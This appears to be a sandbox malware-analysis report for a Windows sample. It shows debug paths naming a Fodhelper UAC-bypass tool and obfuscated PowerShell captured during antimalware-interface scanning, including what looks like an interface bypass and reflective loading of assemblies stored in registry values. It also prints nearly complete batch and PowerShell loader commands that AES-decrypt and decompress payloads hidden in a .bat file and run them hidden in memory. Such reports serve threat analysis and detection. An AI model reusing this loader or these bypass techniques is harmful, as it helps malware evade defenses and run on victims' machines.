Source: Binary string: D:\a\_work\1\s\src\vctools\crt\vcstartup\src\misc\amd64\guard_dispatch.asmD:\a\_work\1\s\src\vctools\crt\vcstartup\src\misc\amd64\guard_xfg_dispatch.asmD:\a\_work\1\s\src\vctools\crt\vcstartup\src\gs\amd64\amdsecgs.asmC:\Users\miles\Downloads\FodhelperBypassUAC-master\x64\Release\FodhelperBypassUAC.pdb source: e7WMhx18XN.exe, 00000001.00000002.1329806773.0000000013396000.00000004.00000800.00020000.00000000.sdmp, e7WMhx18XN.exe, 00000001.00000002.1329806773.0000000013274000.00000004.00000800.00020000.00000000.sdmp, e7WMhx18XN.exe, 00000001.00000002.1329806773.0000000013305000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:\Users\miles\Downloads\FodhelperBypassUAC-master\FodhelperBypassUAC\x64\Release\vc143.pdb source: e7WMhx18XN.exe, 00000001.00000002.1329806773.0000000013396000.00000004.00000800.00020000.00000000.sdmp, e7WMhx18XN.exe, 00000001.00000002.1329806773.0000000013274000.00000004.00000800.00020000.00000000.sdmp, e7WMhx18XN.exe, 00000001.00000002.1329806773.0000000013305000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: FodhelperBypassUAC.pdb source: e7WMhx18XN.exe, 00000001.00000002.1329521991.0000000003261000.00000004.00000800.00020000.00000000.sdmp

Data Obfuscation

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: GetDelegateForFunctionPointer($PQfPIIgelMLvUB,$ldjQKaGUcclhcmhFUiK).Invoke(''+[Char](97)+''+[Char](109)+''+'s'+'i'+[Char](46)+''+'d'+''+[Char](108)+''+'l'+'');$rcGSxwaaaaKUimwsu=$yNoIOiWMAQGoVU.Invoke
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+'e'+'f'+'l'+'e'+''+'c'+''+[Char](116)+''+[Char](101)+''+[Char](100)+''+[Char](68)+''+'e'+'l'+[Char](101)+''+[Char](103)+''+'a'+'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+'S'+''+[Char](79)+''+[Char](70)+'TW'+'A'+''+[Char](82)+''+'E'+'').GetValue(''+[Char](36)+'r'+[Char](98)+''+[Char](120)+'-'+[Char]
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: GetDelegateForFunctionPointer($scqjgRcUiQSTBu,$ivpgsCMtihnowdNIBeH).Invoke(''+[Char](97)+'m'+[Char](115)+''+'i'+'.d'+'l'+''+[Char](108)+'');$EVtyXOreozsddqFlq=$xRDavNIGnzLLon.Invoke($Null,@([Object]$s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: DefineDynamicAssembly((New-Object Reflection.AssemblyName('R'+'e'+'f'+[Char](108)+''+'e'+''+'c'+'te'+'d'+'D'+[Char](101)+'le'+'g'+''+[Char](97)+''+[Char](116)+'e')),[Reflection.Emit.AssemblyBuilderAcc
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+''+[Char](70)+'T'+'W'+''+[Char](65)+''+[Char](82)+'E').GetValue(''+[Char](36)+''+'r'+''+[Char](98)+''+'x
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: GetDelegateForFunctionPointer($VQjNvPkAQyhVaI,$vKwAkflJKGpUwNhZmaw).Invoke(''+'a'+''+[Char](109)+''+[Char](115)+''+[Char](105)+''+'.'+''+'d'+''+[Char](108)+'l');$ZjZDXRvDVpnzBqGGH=$ONnlOWkAfaUoGE.Invo
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: DefineDynamicAssembly((New-Object Reflection.AssemblyName('R'+[Char](101)+''+[Char](102)+''+[Char](108)+''+[Char](101)+''+[Char](99)+''+[Char](116)+'e'+[Char](100)+''+[Char](68)+'e'+[Char](108)+'eg'+'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+''+'F'+''+[Char](84)+'W'+'A'+'R'+[Char](69)+'').GetValue(''+'$'+'r'+[Char](98)+''+'x'+'-'+[Char](115)+'t
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: GetDelegateForFunctionPointer($ViSGjgKFWHOvJi,$LYPstsFMvGDueCuqqFR).Invoke(''+'a'+''+[Char](109)+'s'+'i'+''+[Char](46)+'dll');$iERkOmaiRJGubWlVw=$kCZXEMoRMGVaoJ.Invoke($Null,@([Object]$JKCdsPm,[Object
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+'e'+'f'+[Char](108)+''+[Char](101)+''+'c'+'t'+[Char](101)+''+[Char](100)+''+'D'+'e'+'l'+''+[Char](101)+''+'g'+''+[Char](97)+'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+''+[Char](70)+'T'+[Char](87)+'AR'+'E'+'').GetValue(''+'$'+''+[Char](114)+''+'b'+''+[Char](120)+''+'-'+''
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:fuLUlHVbHHgj{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$NnulhBqzTpRDhV,[Parameter(Position=1)][Type]$OFCpxNfkPy)$qvWXxLMOaNu=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+'e'+'f'+'l'+'e'+''+'c'+''+[Char](116)+''+[Char](101)+''+[Char](100)+''+[Char](68)+''+'e'+'l'+[Char](101)+''+[Char](103)+''+'a'+''+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('I'+[Char](110)+'Me'+[Char](109)+'o'+[Char](114)+''+[Char](121)+''+[Char](77)+'odul'+[Char](101)+'',$False).DefineType(''+'M'+''+[Char](121)+''+[Char](68)+''+'e'+''+[Char](108)+'e'+[Char](103)+'a'+[Char](116)+''+'e'+'T'+[Char](121)+''+[Char](112)+''+'e'+'','C'+[Char](108)+''+'a'+'ss'+[Char](44)+''+'P'+''+[Char](117)+'b'+[Char](108)+''+[Char](105)+''+[Char](99)+''+[Char](44)+''+'S'+''+[Char](101)+''+[Char](97)+''+'l'+'e'+[Char](100)+''+[Char](44)+''+[Char](65)+''+[Char](110)+'s'+[Char](105)+''+[Char](67)+'l'+'a'+'s'+[Char](115)+','+[Char](65)+''+[Char](117)+''+[Char](116)+'oC'+'l'+''+'a'+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$qvWXxLMOaNu.DefineConstructor(''+[Char](82)+''+[Char](84)+'S'+[Char](112)+''+[Char](101)+''+'c'+''+'i'+''+[Char](97)+''+[Char](108)+'N'+[Char](97)+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](72)+''+[Char](105)+''+[Char](100)+''+[Char](101)+'By'+[Char](83)+''+'i'+''+[Char](103)+''+[Char](44)+'Pu'+'b'+''+'l'+'i'+'c'+'',[Reflection.CallingConventions]::Standard,$NnulhBqzTpRDhV).SetImplementationFlags(''+'R'+''+[Char](117)+''+[Char](110)+'t'+'i'+''+[Char](109)+''+[Char](101)+',Ma'+'n'+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+[Char](100)+'');$qvWXxLMOaNu.DefineMethod(''+'I'+''+'n'+''+[Char](118)+''+[Char](111)+''+[Char](107)+''+[Char](101)+'','P'+'u'+''+[Char](98)+'l'+[Char](105)+'c'+','+''+[Char](7
2)+''+[Char](105)+'de'+'B'+''+'y'+''+'S'+'i'+[Char](103)+','+[Char](78)+''+'e'+''+'w'+''+'S'+''+[Char](108)+'ot'+[Char](44)+''+'V'+''+'i'+''+'r'+'t'+[Char](117)+''+'a'+'l',$OFCpxNfkPy,$NnulhBqzTpRDhV).SetImplementationFlags(''+'R'+''+'u'+''+[Char](110)+''+'t'+''+[Char](105)+'m'+[Char](101)+''+','+'M'+'a'+'n'+[Char](97)+'g'+[Char](101)+''+'d'+'');Write-Output $qvWXxLMOaNu.CreateType();}$iKNksxDtTNKAc=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+''+'s'+''+'t'+''+[Char](101)+''+'m'+''+[Char](46)+''+[Char](100)+'l'+[Char](108)+'')}).GetType(''+'M'+'ic'+[Char](114)+''+[Char](111)+''+[Char](115)+''+[Char](111)+''+[Char](102)+''+'t'+''+[Char](46)+''+[Char](87)+''+[Char](105)+''+[Char](110)+''+'3'+''+[Char](50)+''+'.'+'U'+'n'+''+[Char](115)+''+[Char](97)+''+[Char](102)+''+[Char](101)+''+'N'+''+[Char](97)+''+'t'+''+[Char](105)+''+'v'+''+[Char](101)+''+[Char](77)+''+[Char](101)+''+[Char](116)+''+'h'+''+[Char](111)+''+[Char](10
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:kveHNQwSSGcg{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$mhKVIvEXzPrIho,[Parameter(Position=1)][Type]$QOutAUbbtF)$MsesbhAsMah=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('R'+'e'+'f'+[Char](108)+''+'e'+''+'c'+'te'+'d'+'D'+[Char](101)+'le'+'g'+''+[Char](97)+''+[Char](116)+'e')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+''+[Char](110)+''+[Char](77)+''+[Char](101)+''+'m'+''+[Char](111)+'ry'+[Char](77)+''+[Char](111)+'dul'+'e'+'',$False).DefineType(''+[Char](77)+'y'+[Char](68)+''+'e'+''+'l'+''+'e'+''+'g'+''+[Char](97)+''+'t'+''+'e'+'T'+[Char](121)+''+[Char](112)+''+[Char](101)+'',''+'C'+''+'l'+''+[Char](97)+''+'s'+'s'+','+''+[Char](80)+''+[Char](117)+''+[Char](98)+'l'+[Char](105)+'c'+[Char](44)+''+[Char](83)+''+[Char](101)+'a'+[Char](108)+'e'+[Char](100)+''+[Char](44)+''+[Char](65)+''+[Char](110)+''+[Char](115)+''+[Char](105)+'C'+[Char](108)+''+[Char](97)+''+[Char](115)+'s,'+[Char](65)+'u'+[Char](116)+'o'+'C'+'la'+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$MsesbhAsMah.DefineConstructor(''+[Char](82)+''+[Char](84)+''+'S'+''+[Char](112)+''+'e'+'c'+'i'+''+[Char](97)+''+[Char](108)+''+[Char](78)+'ame'+[Char](44)+''+[Char](72)+''+'i'+'d'+[Char](101)+''+[Char](66)+'y'+[Char](83)+''+[Char](105)+''+[Char](103)+''+[Char](44)+''+[Char](80)+''+[Char](117)+''+[Char](98)+'li'+[Char](99)+'',[Reflection.CallingConventions]::Standard,$mhKVIvEXzPrIho).SetImplementationFlags(''+'R'+''+[Char](117)+''+'n'+''+'t'+''+[Char](105)+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](77)+''+[Char](97)+''+[Char](110)+''+[Char](97)+''+[Char](103)+'e'+[Char](100)+'');$MsesbhAsMah.DefineMethod(''+[Char](73)+'nv'+'o'+'k'+'e'+'',''+[Char](80)+''+'u'+''+'b'+''+[Char](108)+''+[Char](105)+''+[Char](99)+''+','+''+[Char](72)+'i'+'d'+'eB'+'y'+'S'+'i'+
'g'+','+''+[Char](78)+''+'e'+'w'+[Char](83)+''+'l'+''+[Char](111)+''+'t'+''+','+''+'V'+''+'i'+''+[Char](114)+''+'t'+''+[Char](117)+''+'a'+'l',$QOutAUbbtF,$mhKVIvEXzPrIho).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+'t'+[Char](105)+'m'+[Char](101)+''+','+''+[Char](77)+'ana'+[Char](103)+''+[Char](101)+'d');Write-Output $MsesbhAsMah.CreateType();}$gFfWslPcsIxEF=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+'y'+'s'+[Char](116)+'e'+[Char](109)+''+'.'+''+'d'+''+[Char](108)+''+'l'+'')}).GetType(''+[Char](77)+''+'i'+''+'c'+''+[Char](114)+'o'+[Char](115)+'o'+[Char](102)+''+[Char](116)+''+'.'+''+'W'+'i'+'n'+'32.'+[Char](85)+'n'+[Char](115)+''+[Char](97)+''+'f'+''+[Char](101)+'Na'+[Char](116)+'i'+[Char](118)+''+[Char](101)+''+[Char](77)+''+'e'+''+[Char](116)+''+'h'+''+[Char](111)+''+[Char](100)+'s');$xRDavNIGnzLLon=$gFfWslPcsIxEF.GetMethod(''+'G'+''+'e'+''+[Char](116)+''+[Char](80)+''+'r'+'o'+[Char](99)+''+'A'+''+[Cha
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:YrWHxoHyNMxl{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$mJbpaFOyxDMlLp,[Parameter(Position=1)][Type]$mBxcLwMzji)$qsXeIcuzIEU=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('R'+[Char](101)+''+[Char](102)+''+[Char](108)+''+[Char](101)+''+[Char](99)+''+[Char](116)+'e'+[Char](100)+''+[Char](68)+'e'+[Char](108)+'eg'+'a'+''+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+'n'+'M'+'e'+'m'+'o'+[Char](114)+''+'y'+''+[Char](77)+'o'+'d'+''+[Char](117)+''+'l'+''+[Char](101)+'',$False).DefineType(''+[Char](77)+''+'y'+'D'+'e'+''+'l'+'e'+[Char](103)+'a'+[Char](116)+'e'+[Char](84)+''+'y'+''+'p'+'e',''+[Char](67)+''+'l'+'a'+'s'+''+[Char](115)+''+[Char](44)+'P'+[Char](117)+''+'b'+''+'l'+'ic'+[Char](44)+''+[Char](83)+''+[Char](101)+''+[Char](97)+'le'+'d'+','+[Char](65)+''+'n'+'siC'+'l'+'a'+'s'+''+[Char](115)+''+[Char](44)+''+'A'+'ut'+[Char](111)+''+'C'+''+[Char](108)+''+'a'+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$qsXeIcuzIEU.DefineConstructor(''+[Char](82)+''+[Char](84)+'Sp'+[Char](101)+''+[Char](99)+''+'i'+'a'+[Char](108)+''+[Char](78)+''+[Char](97)+''+[Char](109)+'e,H'+'i'+''+'d'+'e'+'B'+''+'y'+'S'+[Char](105)+''+'g'+''+[Char](44)+''+[Char](80)+'ub'+[Char](108)+'i'+[Char](99)+'',[Reflection.CallingConventions]::Standard,$mJbpaFOyxDMlLp).SetImplementationFlags(''+[Char](82)+''+[Char](117)+'nt'+'i'+''+'m'+''+'e'+''+[Char](44)+''+'M'+'a'+[Char](110)+''+'a'+''+'g'+''+'e'+''+'d'+'');$qsXeIcuzIEU.DefineMethod('I'+[Char](110)+'v'+'o'+''+[Char](107)+''+'e'+'','P'+[Char](117)+''+[Char](98)+''+[Char](108)+'i'+'c'+''+','+''+'H'+'i'+'d'+''+'e'+'B'+[Char](121)+''+[Char](83)+'i'+'g'+''+','+''+'N'+''+[Char](101)+''+'w'+'S'+[Char](108)+''+[Char](111)+''+[Char](116)+','+'V'+''+[Char](105)+''+'r'+'t'+[Char](11
7)+'a'+[Char](108)+'',$mBxcLwMzji,$mJbpaFOyxDMlLp).SetImplementationFlags(''+[Char](82)+''+'u'+''+'n'+''+[Char](116)+''+'i'+''+'m'+''+[Char](101)+''+[Char](44)+''+[Char](77)+'a'+[Char](110)+''+[Char](97)+''+'g'+''+[Char](101)+''+'d'+'');Write-Output $qsXeIcuzIEU.CreateType();}$XabpoaxiZGEGR=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+''+[Char](121)+''+[Char](115)+''+[Char](116)+''+[Char](101)+''+[Char](109)+''+[Char](46)+''+[Char](100)+''+[Char](108)+'l')}).GetType(''+[Char](77)+''+[Char](105)+''+[Char](99)+''+[Char](114)+''+'o'+''+'s'+'o'+[Char](102)+''+[Char](116)+''+'.'+''+'W'+''+[Char](105)+'n32'+[Char](46)+'Uns'+'a'+''+[Char](102)+''+[Char](101)+''+[Char](78)+''+[Char](97)+''+[Char](116)+''+[Char](105)+''+'v'+''+[Char](101)+'M'+[Char](101)+''+[Char](116)+'h'+[Char](111)+'d'+[Char](115)+'');$ONnlOWkAfaUoGE=$XabpoaxiZGEGR.GetMethod(''+'G'+''+[Char](101)+''+[Char](116)+''+'P'+'r'+[Char](111)+''+[Char](99)+'A'+[Char](100)+''+'d'+''+[Cha
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:NyGuwfckeOJe{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$kiyDauQzMkkpvQ,[Parameter(Position=1)][Type]$OzRVWwEZvx)$JcZRwmspQGK=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+'e'+'f'+[Char](108)+''+[Char](101)+''+'c'+'t'+[Char](101)+''+[Char](100)+''+'D'+'e'+'l'+''+[Char](101)+''+'g'+''+[Char](97)+''+[Char](116)+''+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('In'+[Char](77)+'e'+[Char](109)+''+[Char](111)+'ry'+[Char](77)+''+'o'+''+'d'+'u'+[Char](108)+''+'e'+'',$False).DefineType(''+'M'+''+[Char](121)+''+[Char](68)+''+'e'+''+[Char](108)+''+[Char](101)+''+[Char](103)+'a'+[Char](116)+''+[Char](101)+''+[Char](84)+'yp'+'e'+'',''+'C'+''+'l'+''+'a'+''+'s'+'s,P'+[Char](117)+''+[Char](98)+''+[Char](108)+''+'i'+'c'+','+''+[Char](83)+''+[Char](101)+''+'a'+'le'+'d'+''+[Char](44)+''+'A'+''+[Char](110)+''+[Char](115)+''+[Char](105)+''+'C'+''+[Char](108)+''+'a'+''+[Char](115)+'s'+[Char](44)+''+[Char](65)+'u'+'t'+'o'+[Char](67)+''+'l'+''+'a'+'ss',[MulticastDelegate]);$JcZRwmspQGK.DefineConstructor('RT'+[Char](83)+''+[Char](112)+''+[Char](101)+''+[Char](99)+''+[Char](105)+'a'+'l'+''+[Char](78)+''+[Char](97)+''+[Char](109)+''+'e'+','+'H'+'i'+[Char](100)+'e'+[Char](66)+''+[Char](121)+''+[Char](83)+'ig'+[Char](44)+''+'P'+''+[Char](117)+'b'+[Char](108)+'i'+[Char](99)+'',[Reflection.CallingConventions]::Standard,$kiyDauQzMkkpvQ).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+'n'+''+[Char](116)+'ime,'+[Char](77)+''+[Char](97)+''+'n'+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+[Char](100)+'');$JcZRwmspQGK.DefineMethod('I'+[Char](110)+''+[Char](118)+''+'o'+''+[Char](107)+''+[Char](101)+'',''+[Char](80)+''+[Char](117)+''+'b'+''+'l'+''+[Char](105)+''+[Char](99)+','+[Char](72)+''+'i'+''+[Char](100)+''+'e'+'B'+'y'+''+[Char](83
)+''+[Char](105)+''+[Char](103)+','+'N'+''+[Char](101)+'w'+[Char](83)+''+'l'+''+[Char](111)+''+[Char](116)+''+','+'V'+[Char](105)+'rt'+[Char](117)+''+[Char](97)+''+[Char](108)+'',$OzRVWwEZvx,$kiyDauQzMkkpvQ).SetImplementationFlags('R'+'u'+''+'n'+''+[Char](116)+''+[Char](105)+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+'M'+''+[Char](97)+''+[Char](110)+''+'a'+'ge'+'d'+'');Write-Output $JcZRwmspQGK.CreateType();}$fMzQsfZpmgSNo=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('S'+[Char](121)+''+[Char](115)+''+[Char](116)+'em'+'.'+''+[Char](100)+'ll')}).GetType(''+[Char](77)+''+[Char](105)+''+[Char](99)+''+'r'+''+[Char](111)+''+[Char](115)+''+'o'+''+'f'+''+[Char](116)+'.'+[Char](87)+'in'+[Char](51)+''+[Char](50)+''+[Char](46)+''+'U'+'ns'+'a'+''+'f'+''+'e'+''+[Char](78)+''+'a'+'t'+[Char](105)+''+'v'+'eM'+[Char](101)+''+[Char](116)+''+'h'+'o'+[Char](100)+''+[Char](115)+'');$kCZXEMoRMGVaoJ=$fMzQsfZpmgSNo.GetMethod(''+[Char](71)+''+[Char](101)+''+'t'+''+[
Source: C:\Windows\System32\cmd.exe Process created: cmd.exe /c echo function elgju($CRcTF){ $KmeGB=[System.Security.Cryptography.Aes]::Create(); $KmeGB.Mode=[System.Security.Cryptography.CipherMode]::CBC; $KmeGB.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $KmeGB.Key=[System.Convert]::FromBase64String('yXhq0Zci7Ki7oYmTRrbYbju3J/i3HBqGk5Zcg1aE0Uo='); $KmeGB.IV=[System.Convert]::FromBase64String('WdcPQiNwNN818it8sRh8xg=='); $TgPAd=$KmeGB.CreateDecryptor(); $dQIvJ=$TgPAd.TransformFinalBlock($CRcTF, 0, $CRcTF.Length); $TgPAd.Dispose(); $KmeGB.Dispose(); $dQIvJ;}function VIxdo($CRcTF){ Invoke-Expression '$VBZuZ=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$CRcTF);'.Replace('blck', ''); Invoke-Expression '$sdANW=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$IHCXJ=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($VBZuZ, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $IHCXJ.CopyTo($sdANW); $IHCXJ.Dispose(); $VBZuZ.Dispose(); $sdANW.Dispose(); $sdANW.ToArray();}function gYUmc($CRcTF,$tscxF){ Invoke-Expression '$jaygU=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$CRcTF);'.Replace('blck', ''); Invoke-Expression '$aZTCr=$jaygU.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$aZTCr.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $tscxF)blck;'.Replace('blck', '');}$DuTVY = 
'C:\Users\user\AppData\Local\Temp\b.bat';$host.UI.RawUI.WindowTitle = $DuTVY;$FQcuc=[System.IO.File]::ReadAllText($DuTVY).Split([Environment]::NewLine);foreach ($BcNGU in $FQcuc) { if ($BcNGU.StartsWith(':: ')) { $sDcLn=$BcNGU.Substring(3); break; }}$fKndv=[string[]]$sDcLn.Split('\');Invoke-Expression '$pcpOF=VIxdo (elgju (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($fKndv[0])));'.Replace('blck', '');Invoke-Expression '$TAQWK=VIxdo (elgju (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($fKndv[1])));'.Replace('blck', '');gYUmc $pcpOF (,[string[]] (''));gYUmc $TAQWK (,[string[]] (''));
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: "C:\Windows\System32\cmd.exe" /C echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden | powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\cmd.exe Process created: cmd.exe /c echo function elgju($CRcTF){ $KmeGB=[System.Security.Cryptography.Aes]::Create(); $KmeGB.Mode=[System.Security.Cryptography.CipherMode]::CBC; $KmeGB.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $KmeGB.Key=[System.Convert]::FromBase64String('yXhq0Zci7Ki7oYmTRrbYbju3J/i3HBqGk5Zcg1aE0Uo='); $KmeGB.IV=[System.Convert]::FromBase64String('WdcPQiNwNN818it8sRh8xg=='); $TgPAd=$KmeGB.CreateDecryptor(); $dQIvJ=$TgPAd.TransformFinalBlock($CRcTF, 0, $CRcTF.Length); $TgPAd.Dispose(); $KmeGB.Dispose(); $dQIvJ;}function VIxdo($CRcTF){ Invoke-Expression '$VBZuZ=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$CRcTF);'.Replace('blck', ''); Invoke-Expression '$sdANW=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$IHCXJ=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($VBZuZ, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $IHCXJ.CopyTo($sdANW); $IHCXJ.Dispose(); $VBZuZ.Dispose(); $sdANW.Dispose(); $sdANW.ToArray();}function gYUmc($CRcTF,$tscxF){ Invoke-Expression '$jaygU=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$CRcTF);'.Replace('blck', ''); Invoke-Expression '$aZTCr=$jaygU.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$aZTCr.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $tscxF)blck;'.Replace('blck', '');}$DuTVY = 
'C:\Windows\$rbx-onimai2\$rbx-CO2.bat';$host.UI.RawUI.WindowTitle = $DuTVY;$FQcuc=[System.IO.File]::ReadAllText($DuTVY).Split([Environment]::NewLine);foreach ($BcNGU in $FQcuc) { if ($BcNGU.StartsWith(':: ')) { $sDcLn=$BcNGU.Substring(3); break; }}$fKndv=[string[]]$sDcLn.Split('\');Invoke-Expression '$pcpOF=VIxdo (elgju (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($fKndv[0])));'.Replace('blck', '');Invoke-Expression '$TAQWK=VIxdo (elgju (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($fKndv[1])));'.Replace('blck', '');gYUmc $pcpOF (,[string[]] (''));gYUmc $TAQWK (,[string[]] (''));
Source: unknown Process created: cmd.exe /C echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden | powershell.exe -WindowStyle Hidden
Source: unknown Process created: "C:\Windows\system32\cmd.exe" /c echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden | powershell.exe -WindowStyle Hidden
Source: unknown Process created: "C:\Windows\system32\cmd.exe" /c echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden | powershell.exe -WindowStyle Hidden
